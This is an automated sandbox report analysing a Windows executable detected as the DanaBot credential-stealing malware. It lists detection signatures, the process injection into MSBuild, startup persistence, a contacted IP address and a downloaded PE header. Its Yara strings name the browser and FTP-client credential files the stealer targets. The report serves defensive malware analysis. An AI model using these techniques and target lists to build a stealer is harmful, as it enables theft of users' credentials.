Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VirtualPR.exe

Overview

General Information

Sample name:VirtualPR.exe
Analysis ID:1620350
MD5:283c93984009435b7847eba249c34122
SHA1:3f90e6f03c3b9f27bd371eb3420bc8c4bd6ec9a2
SHA256:d559fc0cd3ec7237123d1a3b26147c7a78f4e71900750828081518ec9cb42c55
Tags:exeuser-N3utralZ0ne
Infos:

Detection

DanaBot
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for dropped file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected DanaBot stealer dll
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code contains very large strings
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Compiles code for process injection (via .Net compiler)
Compiles code to access protected / encrypted code
Found API chain indicative of debugger detection
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
May use the Tor software to hide its network traffic
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Silenttrinity Stager Msbuild Activity
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries information about the installed CPU (vendor, model number etc)
Queries the installation date of Windows
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • VirtualPR.exe (PID: 2184 cmdline: "C:\Users\user\Desktop\VirtualPR.exe" MD5: 283C93984009435B7847EBA249C34122)
    • csc.exe (PID: 4436 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wbuje1zp\wbuje1zp.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • conhost.exe (PID: 5948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 64 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6976.tmp" "c:\Users\user\AppData\Local\Temp\wbuje1zp\CSCF3101B1DB5FD4234B8D9E3A32E163AE3.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
    • csc.exe (PID: 1616 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\saruzovf\saruzovf.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • conhost.exe (PID: 3472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 5196 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6F42.tmp" "c:\Users\user\AppData\Local\Temp\saruzovf\CSC9247E5327A274F0EA6778942D33863E.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
    • MSBuild.exe (PID: 3236 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 6416 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 3516 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 4016 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • VirtualPR.exe (PID: 2052 cmdline: "C:\Windows\Temp\VirtualPR.exe" MD5: 283C93984009435B7847EBA249C34122)
    • csc.exe (PID: 672 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\doceyppt.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • conhost.exe (PID: 4412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 5376 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAE8E.tmp" "c:\Users\user\AppData\Local\Temp\CSC5102464C238E498091ADEB255F7180.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
    • csc.exe (PID: 1824 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ouz2pkol.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • conhost.exe (PID: 5692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 5448 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB6AC.tmp" "c:\Users\user\AppData\Local\Temp\CSCEC34565AAA024FAC8226FC17CD3A3374.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
    • MSBuild.exe (PID: 3884 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 2728 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
DanaBotProofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social usering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on quality over quantity in email-based threats. DanaBots modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker.
  • SCULLY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000C.00000002.4557432637.000000000388B000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_DanaBot_stealer_dllYara detected DanaBot stealer dllJoe Security
    00000016.00000002.2378527968.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000016.00000002.2378527968.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_DanaBot_stealer_dllYara detected DanaBot stealer dllJoe Security
        00000016.00000002.2378527968.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
        • 0x32fa28:$f1: FileZilla\recentservers.xml
        • 0x32f9e4:$f2: FileZilla\sitemanager.xml
        • 0x35b05e:$b1: Chrome\User Data\
        • 0x361ca2:$b1: Chrome\User Data\
        • 0x3627be:$b1: Chrome\User Data\
        • 0x3421fe:$b2: Mozilla\Firefox\Profiles
        • 0x355f8a:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
        • 0x380f9e:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
        • 0x354974:$b4: Opera Software\Opera Stable\Login Data
        • 0x35b12e:$b5: YandexBrowser\User Data\
        • 0x373c18:$s5: account.cfn
        • 0x353e52:$s6: wand.dat
        • 0x353906:$a1: username_value
        • 0x359ed2:$a1: username_value
        • 0x35a1a2:$a1: username_value
        • 0x35c656:$a1: username_value
        • 0x353932:$a2: password_value
        • 0x359f2a:$a2: password_value
        • 0x35a1fa:$a2: password_value
        • 0x35c6ae:$a2: password_value
        • 0x35d752:$a3: encryptedUsername
        00000000.00000002.2214849304.00000000073F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 15 entries
          SourceRuleDescriptionAuthorStrings
          22.2.MSBuild.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            22.2.MSBuild.exe.400000.0.unpackJoeSecurity_DanaBot_stealer_dllYara detected DanaBot stealer dllJoe Security
              22.2.MSBuild.exe.400000.0.unpackINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
              • 0x32ee28:$f1: FileZilla\recentservers.xml
              • 0x32ede4:$f2: FileZilla\sitemanager.xml
              • 0x35a45e:$b1: Chrome\User Data\
              • 0x3610a2:$b1: Chrome\User Data\
              • 0x361bbe:$b1: Chrome\User Data\
              • 0x3415fe:$b2: Mozilla\Firefox\Profiles
              • 0x35538a:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
              • 0x38039e:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
              • 0x353d74:$b4: Opera Software\Opera Stable\Login Data
              • 0x35a52e:$b5: YandexBrowser\User Data\
              • 0x373018:$s5: account.cfn
              • 0x353252:$s6: wand.dat
              • 0x352d06:$a1: username_value
              • 0x3592d2:$a1: username_value
              • 0x3595a2:$a1: username_value
              • 0x35ba56:$a1: username_value
              • 0x352d32:$a2: password_value
              • 0x35932a:$a2: password_value
              • 0x3595fa:$a2: password_value
              • 0x35baae:$a2: password_value
              • 0x35cb52:$a3: encryptedUsername
              22.2.MSBuild.exe.35d0000.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                22.2.MSBuild.exe.35d0000.1.unpackJoeSecurity_DanaBot_stealer_dllYara detected DanaBot stealer dllJoe Security
                  Click to see the 4 entries

                  System Summary

                  barindex
                  Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 196.251.86.101, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 4016, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49712
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wbuje1zp\wbuje1zp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wbuje1zp\wbuje1zp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\VirtualPR.exe", ParentImage: C:\Users\user\Desktop\VirtualPR.exe, ParentProcessId: 2184, ParentProcessName: VirtualPR.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wbuje1zp\wbuje1zp.cmdline", ProcessId: 4436, ProcessName: csc.exe
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\VirtualPR.exe, ProcessId: 2184, TargetFilename: C:\Users\user\AppData\Local\Temp\wbuje1zp\wbuje1zp.cmdline

                  Data Obfuscation

                  barindex
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\VirtualPR.exe, ProcessId: 2184, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.url
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wbuje1zp\wbuje1zp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wbuje1zp\wbuje1zp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\VirtualPR.exe", ParentImage: C:\Users\user\Desktop\VirtualPR.exe, ParentProcessId: 2184, ParentProcessName: VirtualPR.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wbuje1zp\wbuje1zp.cmdline", ProcessId: 4436, ProcessName: csc.exe
                  No Suricata rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\ouz2pkol.dllAvira: detection malicious, Label: TR/Dropper.Gen7
                  Source: C:\Users\user\AppData\Local\Temp\saruzovf\saruzovf.dllAvira: detection malicious, Label: TR/Dropper.Gen7
                  Source: VirtualPR.exeVirustotal: Detection: 22%Perma Link
                  Source: VirtualPR.exeReversingLabs: Detection: 36%
                  Source: Yara matchFile source: 22.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.MSBuild.exe.35d0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.4557432637.000000000388B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2378527968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2214849304.00000000073F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2202796339.00000000060C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2202796339.00000000066C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2388879028.00000000035E9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: VirtualPR.exe PID: 2184, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4016, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2728, type: MEMORYSTR
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA2198 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,22_2_03AA2198
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA10D4 CryptAcquireContextA,CryptImportKey,CryptAcquireContextA,CryptDecrypt,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,22_2_03AA10D4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA07D8 CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptExportKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,22_2_03AA07D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA2698 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,22_2_03AA2698
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA14B8 CryptAcquireContextA,CryptImportKey,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptExportKey,CryptEncrypt,CryptEncrypt,CryptEncrypt,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,CryptDestroyKey,CryptReleaseContext,22_2_03AA14B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA0910 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptEncrypt,CryptEncrypt,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptImportKey,CryptSignHashA,CryptSignHashA,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,22_2_03AA0910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA2898 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,22_2_03AA2898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA0CC4 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptAcquireContextA,CryptImportKey,CryptCreateHash,CryptHashData,CryptVerifySignatureW,CryptDecrypt,CryptDestroyHash,CryptReleaseContext,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,22_2_03AA0CC4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA22E5 CryptReleaseContext,22_2_03AA22E5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA2164 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,22_2_03AA2164
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA1035 CryptDestroyKey,22_2_03AA1035
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA1071 CryptReleaseContext,22_2_03AA1071
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA1053 CryptDestroyHash,22_2_03AA1053
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA143C CryptReleaseContext,22_2_03AA143C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA1401 CryptDestroyKey,22_2_03AA1401
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA147A CryptReleaseContext,22_2_03AA147A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA145C CryptDestroyKey,22_2_03AA145C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA0BE3 CryptDestroyHash,22_2_03AA0BE3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA0BC5 CryptDestroyKey,22_2_03AA0BC5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA2ABD CryptReleaseContext,22_2_03AA2ABD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA2A9F CryptDestroyHash,22_2_03AA2A9F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA188C CryptReleaseContext,22_2_03AA188C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA283C CryptDestroyHash,22_2_03AA283C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA1830 CryptDestroyKey,22_2_03AA1830
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA186E CryptDestroyKey,22_2_03AA186E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA184E CryptReleaseContext,22_2_03AA184E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA285A CryptReleaseContext,22_2_03AA285A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA0FF7 CryptDestroyKey,22_2_03AA0FF7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA0C25 CryptDestroyKey,22_2_03AA0C25
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA0C01 CryptReleaseContext,22_2_03AA0C01
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA0C61 CryptReleaseContext,22_2_03AA0C61
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA0C43 CryptDestroyHash,22_2_03AA0C43
                  Source: VirtualPR.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: q:C:\Users\user\AppData\Local\Temp\wbuje1zp\wbuje1zp.pdb source: VirtualPR.exe, 00000000.00000002.2192138622.00000000030C1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: q1C:\Users\user\AppData\Local\Temp\doceyppt.pdb source: VirtualPR.exe, 0000000E.00000002.2378486056.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: q:C:\Users\user\AppData\Local\Temp\saruzovf\saruzovf.pdb source: VirtualPR.exe, 00000000.00000002.2192138622.000000000364D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: q1C:\Users\user\AppData\Local\Temp\ouz2pkol.pdb source: VirtualPR.exe, 0000000E.00000002.2378486056.000000000346D000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_035DE210 FindFirstFileW,FindClose,22_2_035DE210
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_035F3204 FindFirstFileW,FindClose,22_2_035F3204
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_035F36F4 FindFirstFileW,GetLastError,22_2_035F36F4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_035DDC44 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,22_2_035DDC44
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_035F1324 GetLogicalDriveStringsW,QueryDosDeviceW,22_2_035F1324
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppDataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\userJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 20 Feb 2025 20:48:05 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 20 Feb 2025 17:42:16 GMTETag: "583400-62e9665226d2c"Accept-Ranges: bytesContent-Length: 5780480Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f5 e2 b2 6b b1 83 dc 38 b1 83 dc 38 b1 83 dc 38 15 fd dd 39 b3 83 dc 38 15 fd d9 39 b0 83 dc 38 15 fd d8 39 b6 83 dc 38 fa fb dd 39 b4 83 dc 38 b1 83 dd 38 bb 83 dc 38 a7 fc d8 39 b0 83 dc 38 a7 fc de 39 b0 83 dc 38 52 69 63 68 b1 83 dc 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 35 36 b7 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 24 00 26 58 00 00 0c 00 00 00 00 00 00 20 32 58 00 00 10 00 00 00 40 58 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 58 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ac 42 58 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 58 00 80 00 00 00 08 41 58 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 40 58 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 58 00 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 24 58 00 00 10 00 00 00 26 58 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 3a 04 00 00 00 40 58 00 00 06 00 00 00 2a 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 34 03 00 00 00 50 58 00 00 02 00 00 00 30 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 80 00 00 00 00 60 58 00 00 02 00 00 00 32 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
